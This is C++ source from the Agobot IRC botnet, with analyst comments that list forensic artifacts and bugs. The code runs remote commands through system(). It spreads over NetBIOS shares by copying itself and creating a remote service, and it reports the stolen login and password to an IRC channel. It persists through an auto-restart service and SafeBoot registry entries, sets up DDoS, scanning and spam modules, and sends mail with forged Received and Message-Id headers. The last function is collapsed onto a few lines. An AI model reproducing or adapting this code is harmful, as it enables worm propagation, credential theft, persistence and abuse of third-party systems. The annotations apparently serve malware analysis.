    REGCMD(m_cmdCommand, "bot.command", "runs a command with system()", false, this);
    // Nickname: RndNick() applied to the configured prefix; Mid(0, 32)
    // presumably keeps at most the first 32 characters.
    CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
    g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
    // Start time in seconds, taken from the millisecond tick counter.
    m_lStartTime=(unsigned long)GetTickCount()/1000;
}
// Requests a start of the local service named sServicename.
// Returns false if the SCM or the service cannot be opened; otherwise true,
// whether or not StartService succeeded (its result is not checked).
bool CInstaller::ServiceStart(CString &sServicename) {
    SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if(!hServiceControl) return false;
    SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
    if(!hService) {
        CloseServiceHandle(hServiceControl);
        return false;
    }
    StartService(hService, 0, NULL);
    CloseServiceHandle(hService);
    CloseServiceHandle(hServiceControl);
    // Disabled alternative that shelled out to "net start <service>".
    /* CString sCmdBuf; sCmdBuf.Format("net start %s", sServicename.CStr()); system(sCmdBuf.CStr());*/
    return true;
}
// Copies two executables onto a remote share and runs them through a service
// created on the remote host's service control manager.
//
// share:    share name on the remote host (used as \\host\share\...).
// host:     remote machine; also the machine whose SCM is opened.
// user, password: used here only in the status message sent over IRC.
// Returns true if StartService succeeded, false otherwise.
//
// Analyst note -- artifacts named in this block:
//   * a temp file ending in \glx5223.tmp on the originating host,
//   * \\host\share\thesvc.exe plus a second copy named after the
//     bot_filename cvar on the target share,
//   * a demand-start, own-process service with key name "cfgldr" whose
//     display name comes from the as_valname cvar and whose command line is
//     the two quoted UNC paths,
//   * an IRC status line that contains the share, user name and password.
// The stop/delete calls for the service are commented out, so "cfgldr"
// stays registered after the call, while both remote files are deleted at the
// end.
// NOTE(review): the sprintf calls write UNC paths into MAX_PATH buffers with
// no length check.
bool CScannerNetBios::StartViaCreateService(const char *share, const char *host, const char *user, const char *password) {
    bool bRetVal=false;
    char buffer[MAX_PATH];
    SC_HANDLE hServiceControl=OpenSCManager(host, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if(!hServiceControl) return false;
    char szBotRemote[MAX_PATH], szBotSvc[MAX_PATH], szSvcCmd[MAX_PATH];
    CString sTempPath;
    GetTempPath(MAX_PATH, sTempPath.GetBuffer(MAX_PATH));
    sTempPath.Append("\\glx5223.tmp");
    // Three-argument WriteFile taking a resource id: presumably a project
    // helper that dumps resource IDR_AGOBOTSVC to the temp path -- confirm.
    WriteFile(sTempPath.CStr(), IDR_AGOBOTSVC, NULL);
    sprintf(szBotSvc, "\\\\%s\\%s\\%s", host, share, "thesvc.exe");
    // Retry each copy every 100 ms for up to 25 seconds.
    unsigned long lTimeoutStart=GetTickCount();
    while(CopyFile(sTempPath, szBotSvc, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100);
    DeleteFile(sTempPath);
    GetFilename(buffer, MAX_PATH);
    sprintf(szBotRemote, "\\\\%s\\%s\\%s", host, share, g_cMainCtrl.m_cBot.bot_filename.sValue.CStr());
    lTimeoutStart=GetTickCount();
    while(CopyFile(buffer, szBotRemote, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100);
    sprintf(szSvcCmd, "\"%s\" \"%s\"", szBotSvc, szBotRemote);
    SC_HANDLE hService=CreateService(hServiceControl, "cfgldr", g_cMainCtrl.m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
        SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, \
        szSvcCmd, NULL, NULL, NULL, NULL, NULL);
    if(!hService) {
        DWORD dwError=GetLastError();
        if(dwError==ERROR_SERVICE_EXISTS) {
            // Existing "cfgldr": stop it, delete it and start over from the top.
            hService=OpenService(hServiceControl, "cfgldr", SERVICE_ALL_ACCESS);
            if(!hService) {
                CloseServiceHandle(hServiceControl);
                return false;
            }
            SERVICE_STATUS sStatus;
            ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
            DeleteService(hService);
            CloseServiceHandle(hService);
            CloseServiceHandle(hServiceControl);
            return StartViaCreateService(share, host, user, password);
        } else {
            // Any other failure pops a message box with the system error text.
            LPVOID lpMsgBuf;
            FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, \
                NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL);
            MessageBox(NULL, (LPCTSTR)lpMsgBuf, "Error", MB_OK|MB_ICONINFORMATION);
            LocalFree(lpMsgBuf);
            CloseServiceHandle(hServiceControl);
            return false;
        }
    }
    // NOTE(review): the early return on a failed StartService skips both
    // CloseServiceHandle calls and the DeleteFile cleanup below.
    if(hService)
        if(!StartService(hService, 0, NULL)) return bRetVal=false;
        else bRetVal=true;
    SERVICE_STATUS ssTemp;
    // if(hService) ControlService(hService, SERVICE_CONTROL_STOP, &ssTemp);
    // if(hService) DeleteService(hService);
    if(hService) CloseServiceHandle(hService);
    CloseServiceHandle(hServiceControl);
    g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: Exploited \\\\%s\\%s with l/p: %s/%s (CreateService)!!!", m_sScannerName.CStr(), host, share, user, password);
    DeleteFile(szBotRemote);
    DeleteFile(szBotSvc);
    return bRetVal;
}
// Registers an auto-start Windows service whose command line is
// "<sFilename>" <sParams>, sets a restart-on-failure action on it, and then
// adds the service name under the SafeBoot "Minimal" and "Network" keys.
//
// sServicename: service key name; also used as the SafeBoot subkey name and
//               as the value name written inside it.
// sFilename:    executable path, wrapped in quotes in the command line.
// sParams:      arguments appended after the quoted path.
// Returns false if the SCM cannot be opened, if CreateService fails for a
// reason other than ERROR_SERVICE_EXISTS, or if the failure actions cannot be
// set. On ERROR_SERVICE_EXISTS the result is whatever ServiceAdd returns.
// None of the SafeBoot registry calls is checked.
//
// Analyst note -- persistence artifacts created here:
//   * an auto-start service with a restart failure action,
//   * HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\<service> and
//     ...\SafeBoot\Network\<service>, each holding a REG_SZ value named
//     <service> whose data begins with "Service". Entries under these keys
//     control what is loaded in Safe Mode, so they deserve a check during
//     cleanup.
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) {
    SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if(!hServiceControl) return false;
    CString sSvcCmd;
    sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr());
    SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(), g_pMainCtrl->m_pBot->as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
        SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \
        sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
    if(!hService) {
        DWORD dwError=GetLastError();
        if(dwError==ERROR_SERVICE_EXISTS) {
            // A service of that name already exists: delete it and go back
            // through ServiceAdd to create it again.
            // NOTE(review): hService is NULL on this path, so the first close
            // below has nothing to release.
            ServiceDel(sServicename);
            CloseServiceHandle(hService);
            CloseServiceHandle(hServiceControl);
            return ServiceAdd(sServicename, sFilename);
        } else {
            CloseServiceHandle(hServiceControl);
            return false;
        }
    }
    // One failure action: restart the service. SC_ACTION::Delay is in
    // milliseconds, and a reset period of INFINITE means the failure count is
    // never reset.
    SC_ACTION scActions[1];
    scActions[0].Delay=1;
    scActions[0].Type=SC_ACTION_RESTART;
    SERVICE_FAILURE_ACTIONS sfActions;
    sfActions.dwResetPeriod=INFINITE;
    sfActions.lpRebootMsg=NULL;
    sfActions.lpCommand=NULL;
    sfActions.cActions=1;
    sfActions.lpsaActions=scActions;
    if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) {
        CloseServiceHandle(hService);
        CloseServiceHandle(hServiceControl);
        return false;
    }
    CloseServiceHandle(hService);
    CloseServiceHandle(hServiceControl);
    HKEY key;
    HKEY lhmin;
    HKEY lhnet;
    HKEY lhnew;
    DWORD dwSize=128;
    char szDataBuf[128];
    strcpy(szDataBuf, "Service");
    // lRet is assigned but never read.
    LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\", 0, KEY_READ, &key);
    RegOpenKeyEx(key, "Minimal",0,KEY_ALL_ACCESS, &lhmin);
    RegOpenKeyEx(key, "Network",0,KEY_ALL_ACCESS, &lhnet);
    // NOTE(review): dwSize is the full 128-byte buffer, of which only
    // "Service" plus its terminator was initialised, so the stored value
    // carries trailing stack bytes.
    // NOTE(review): lhnew is overwritten by the second RegCreateKeyEx and is
    // never closed.
    RegCreateKeyEx(lhmin, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL);
    RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
    RegCreateKeyEx(lhnet, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL);
    RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
    RegCloseKey(lhnet);
    RegCloseKey(lhmin);
    RegCloseKey(key);
    return true;
}
// Ends the SMTP session: sends QUIT, closes the socket and clears the stored
// server host, port and connected flag.
// Returns false if the socket is not connected, true otherwise. The reply to
// QUIT is not read and the result of the write is not checked.
bool CSMTP_Connection::Disconnect() {
    // Fail if not connected
    if(!m_sServerSocket.IsConnected()) return false;
    // Send QUIT command
    CString sReqBuf;
    sReqBuf.Format("QUIT\r\n");
    m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());
#ifdef DBGCONSOLE
    g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
        "Disconnecting from \"%s:%d\"!\n", this, m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE
    // Close socket and reset variables
    m_sServerSocket.Disconnect();
    m_sServerHost.Assign("");
    m_iServerPort=0;
    m_bConnected=false;
    return true;
}
// Parses a network range written as "a.b.c.d/m" into nRange.
//
// sInput: text to parse; rejected when longer than 18 characters, when it
//         does not contain exactly three dots and exactly one slash, when all
//         four address parts parse to 0, or when the mask is not a multiple
//         of 8.
// nRange: receives iPart1..iPart4 and iNetMask. The fields are written before
//         the last two checks run, so they may be modified even when the
//         function returns false.
// Returns true on success, false otherwise.
// NOTE(review): the parts go through atoi with no range check, so values
// above 255, negative numbers, non-numeric text (parsed as 0) and masks above
// 32 are all accepted as long as the rules above hold.
bool ParseNetRange(const CString &sInput, CNetRange &nRange) {
    // Netrange is never longer than 18 characters
    if(sInput.GetLength()>18) return false;
    // Get temp storage and copy the string
    char *szTemp=new char[sInput.GetLength()+2];
    sprintf(szTemp, "%s", sInput.CStr());
    // Get number of dots and slashes in the string
    int iDotCount=0, iSlashCount=0;
    for(int i=0; i<strlen(szTemp); i++) {
        if(szTemp[i]=='.') iDotCount++;
        else if(szTemp[i]=='/') iSlashCount++;
    }
    // If there are no 3 dots or there is no slash, fail
    if(iDotCount!=3) { delete [] szTemp; return false; }
    if(iSlashCount!=1) { delete [] szTemp; return false; }
    // Make a copy of the string into a CString and parse it
    CString sTemp(szTemp);
    nRange.iPart1=atoi(sTemp.Token(0, "/").Token(0, ".").CStr());
    nRange.iPart2=atoi(sTemp.Token(0, "/").Token(1, ".").CStr());
    nRange.iPart3=atoi(sTemp.Token(0, "/").Token(2, ".").CStr());
    nRange.iPart4=atoi(sTemp.Token(0, "/").Token(3, ".").CStr());
    nRange.iNetMask=atoi(sTemp.Token(1, "/").CStr());
    // Fail if the parts are 0
    if(!nRange.iPart1 && !nRange.iPart2 && !nRange.iPart3 && !nRange.iPart4) { delete [] szTemp; return false; }
    // Fail if the netmask is not a multiple of 8
    if((nRange.iNetMask%8)!=0) { delete [] szTemp; return false; }
    // Success
    delete [] szTemp;
    return true;
}
// Registers the bot's configuration variables with their built-in defaults,
// adds two server records (root and backup 0) to the IRC server list, copies
// the first server's settings into the flat si_* variables and creates the
// initial user account.
// Analyst note: this routine is where a build carries its configuration.
// The values visible here are template placeholders ("irc.somewhere.org",
// "#channel", "Ago-", "filename.exe", "a3-100", "Configuration Loader" and a
// dummy password hash); in a recovered sample the corresponding values are
// the ones worth extracting (server, port, channel, nick prefix, runtime file
// name, autostart value name, operator account).
// NOTE(review): iCryptKey is set but not used in this block; bot_compnick is
// registered twice; scan_auto is registered under both "scan_auto" and
// "scan_auto_nb"; the description of spam_aol_enabled repeats "Channel name".
void CBot::Config() {
    init_random();
    int iCryptKey=10;
    CString sTemp;
    sTemp.Format("%d", brandom(500, 22226));
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick,"bot_compnick","false","CompName Generated Nick",false,false,0);
    // The root server, this will be the most often used one
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_chanpass, "si_server_root.chanpass", \
        "", "Server Info - Channel Password", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_mainchan, "si_server_root.mainchan", \
        "#channel", "Server Info - Main Channel", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_nickprefix, "si_server_root.nickprefix", \
        "Ago-", "Server Info - Nickname prefix", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_port, "si_server_root.port", \
        "6667", "Server Info - Server Port", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_server, "si_server_root.server", \
        "irc.somewhere.org", "Server Info - Server Address", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_servpass, "si_server_root.servpass", \
        "", "Server Info - Server Password", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_usessl, "si_server_root.use_ssl", \
        "false", "Server Info - Use SSL ?", false, false, 0 );
    g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServerRoot);
    // Backup server 0
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_chanpass, "si_server_0.chanpass", \
        "", "Server Info - Channel Password", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_mainchan, "si_server_0.mainchan", \
        "#channel", "Server Info - Main Channel", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_nickprefix, "si_server_0.nickprefix", \
        "Ago-", "Server Info - Nickname prefix", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_port, "si_server_0.port", \
        "6667", "Server Info - Server Port", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_server, "si_server_0.server", \
        "irc2.somewhere.org", "Server Info - Server Address", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_servpass, "si_server_0.servpass", \
        "", "Server Info - Server Password", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_usessl, "si_server_0.use_ssl", \
        "false", "Server Info - Use SSL ?", false, false, 0 );
    g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServer0);
    // Flat si_* variables: registered empty here, filled from server 0 further down.
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_chanpass, "si_chanpass", "", "Server Info - Channel Password", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_mainchan, "si_mainchan", "", "Server Info - Main Channel", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_nickprefix, "si_nickprefix", "", "Server Info - Nickname prefix", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_port, "si_port", "", "Server Info - Server Port", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_server, "si_server", "", "Server Info - Server Address", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_servpass, "si_servpass", "", "Server Info - Server Password", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_usessl, "si_usessl", "", "Server Info - Use SSL ?", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&si_nick, "si_nick", "", "Server Info - Nickname", false, false, 0 );
    // Bot identity, autostart and module settings.
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_version, "bot_version", VERSION_AGOBOT, "Bot - Version", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_filename, "bot_filename", "filename.exe", "Bot - Runtime Filename", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_id, "bot_id", "a3-100", "Bot - Current ID", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_prefix, "bot_prefix", ".", "Bot - Command Prefix", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_ftrans_port, "bot_ftrans_port", sTemp.CStr(), "Bot - File Transfer Port", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_timeout, "bot_timeout", "720000", "Bot - Timeout for receiving in miliseconds", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_seclogin, "bot_seclogin", "false", "Bot - Enable login only by channel messages", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick, "bot_compnick", "false", "Bot - Use the computer name as a nickname", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&as_valname, "as_valname", "Configuration Loader", "Autostart - Value Name", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&as_enabled, "as_enabled", "true", "Autostart - Enabled", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&scan_maxthreads, "scan_maxthreads", "100", "Scanner - Maximum Number of threads", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto, "scan_auto", "true", "Scanner - Autoscan local network", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto, "scan_auto_nb", "true", "Scanner - Autoscan LAN for NetBIOS", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&ddos_maxthreads, "ddos_maxthreads", "100", "DDOS - Maximum Number of threads", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&redir_maxthreads, "redir_maxthreads", "100", "Redirect - Maximum Number of threads", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&identd_enabled, "identd_enabled", "false", "IdentD - Enable the server", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_channel, "spam_aol_channel", "#aolspam", "AOL Spam - Channel name", false, false, 0 );
    g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_enabled, "spam_aol_enabled", "true", "AOL Spam - Channel name", false, false, 0 );
    // Copy the first server record (the root server pushed above) into the
    // flat si_* variables.
    g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_chanpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_chanpass.sValue.CStr());
    g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_mainchan, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_mainchan.sValue.CStr());
    g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_nickprefix, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_nickprefix.sValue.CStr());
    g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_port, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_port.sValue.CStr());
    g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_server, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_server.sValue.CStr());
    g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_servpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_servpass.sValue.CStr());
    g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_usessl, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_usessl.sValue.CStr());
    // Use MD5 Passwords, for security reasons
    g_cMainCtrl.m_cMac.AddUser("User", "MYMD5HASHWILLBEBIGBADANDLONGHEHE", "Netmask.Net", "" ); // "password"
}
// CSMTP_Connection::Mail - submits one message over the already-open SMTP socket.
//
// Parameters: sMailFrom (envelope sender and From address), sMailFromFull
// (display name placed before the From address), sRcptTo (recipient),
// sSubject, sData (message body).
// Returns true only when the server answers the final data block with a reply
// starting with "250"; every failure path calls Disconnect() and returns false.
//
// Flow visible in this function:
//   1. m_iMTAType is chosen with brandom() and a made-up banner string (sMTA)
//      plus a random OS label (sOS) are built for the unknown / Exim /
//      Sendmail / qmail types; the other listed MTA types add nothing, and an
//      unlisted value aborts.
//   2. MAIL FROM, RCPT TO and DATA are sent; the replies must start with
//      250, 250 and 354 respectively.
//   3. The message is assembled in sReqBuf: an optional "Received:" line built
//      from sMTA, then From / To / Subject / Date / MIME headers, sData and the
//      terminating "\r\n.\r\n".
//
// NOTE(review), analysis/detection: the "Received:", "\tid" and "Message-Id:"
// lines are generated locally from random numbers and GenerateID(); no relay
// wrote them, so they carry no routing evidence. Artifacts that follow
// directly from the string building below:
//   - Message-Id has the form <id@recipient-address>, because sRcptTo is
//     appended after the "@".
//   - The Received line reads "from <local part of sMailFrom> by <host>".
//   - In the Sendmail case sMTA already starts with "8." and is appended after
//     the literal "(8." with no space after the host name.
//   - The Date / Received timestamp comes from gmtime() and ends in the
//     literal "GMT".
// NOTE(review): the return value of Recv() is ignored for the MAIL FROM,
// RCPT TO and DATA replies; only the final reply checks it.
// NOTE(review): the text/plain Content-Type branch is commented out; this
// listing is collapsed onto a few physical lines, so which Append calls sit
// inside "//" comments should be confirmed against the original file.
bool CSMTP_Connection::Mail(CString sMailFrom, CString sMailFromFull, CString sRcptTo, CString sSubject, CString sData) { CString sReqBuf, sRecvBuf, sHost, sSrcID, sMTA, sOS; init_random(); m_iMTAType=brandom(MTA_TYPE_UNKNOWN, MTA_TYPE_QMAIL); switch(brandom(1,5)) { case 1: sOS.Assign("Debian"); break; case 2: sOS.Assign("RedHat"); break; case 3: sOS.Assign("SuSE"); break; case 4: sOS.Assign("Slackware"); break; case 5: sOS.Assign("FreeBSD"); break; default: sOS.Assign("Unknown"); break; } switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sMTA.Format("SMTP %s.%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sOS.CStr()); } break; case MTA_TYPE_EXIM: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sNumber.Assign(brandom(1, 5)); sMTA.Format("Exim %s.%s #%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sNumber.CStr(), sOS.CStr()); } break; case MTA_TYPE_SENDMAIL: { CString sVersionHigh, sVersionLow, sVersionLow2; sVersionHigh.Assign(brandom(1, 12)); sVersionLow.Assign(brandom(1, 10)); sVersionLow2.Assign(brandom(1, 10)); sMTA.Format("8.%s.%s/8.%s.%s", sVersionHigh.CStr(), sVersionLow.CStr(), sVersionHigh.CStr(), sVersionLow2.CStr()); } break; case MTA_TYPE_QMAIL: { CString sPid; sPid.Assign(brandom(1, 65000)); CString sInvokedBy; int iInvokedBy=brandom(1,3); if(iInvokedBy==1) { sInvokedBy.Assign("alias"); } else if(iInvokedBy==2) { sInvokedBy.Assign("network"); } else if(iInvokedBy==3) { sInvokedBy.Assign("uid 0"); } sMTA.Format("qmail %s invoked by %s", sPid.CStr(), sInvokedBy.CStr()); } break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; default: #ifdef DBGCONSOLE 
g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Invalid MTA type selected!\n", this); #endif // DBGCONSOLE Disconnect(); return false; break; } // Generate an ID CString sID=GenerateID(); sSrcID.Assign(sID); // Get local hostname sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()); // Send MAIL FROM command sReqBuf.Format("MAIL FROM:<%s>\r\n", sMailFrom.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // MAIL FROM failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\" (\"%s\")!\n", this, sMailFrom.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send RCPT TO command sReqBuf.Format("RCPT TO:<%s>\r\n", sRcptTo.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // RCPT TO failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected RCTP TO \"%s\" (\"%s\")!\n", this, sRcptTo.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send DATA command sReqBuf.Format("DATA\r\n"); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("354")) { // DATA failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected DATA (\"%s\")!\n", this, sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Get local time time_t tGlobal=time(NULL); char szTimeBuf[4096]; strftime(szTimeBuf, sizeof(szTimeBuf), "%a, %d %b %Y %H:%M:%S GMT", gmtime(&tGlobal)); // Clear buffer sReqBuf.Assign(""); switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: 
sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_EXIM: // Received: from xxxx by xxxxx.xxxxxxx.xxx with local (Exim 3.36 #1 (Debian)) sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(")\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_SENDMAIL: // Received: from xxxx by xxxx.xxxxxxx.xxx (8.12.8p1/8.12.6) with local sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append("(8."); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(") with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 
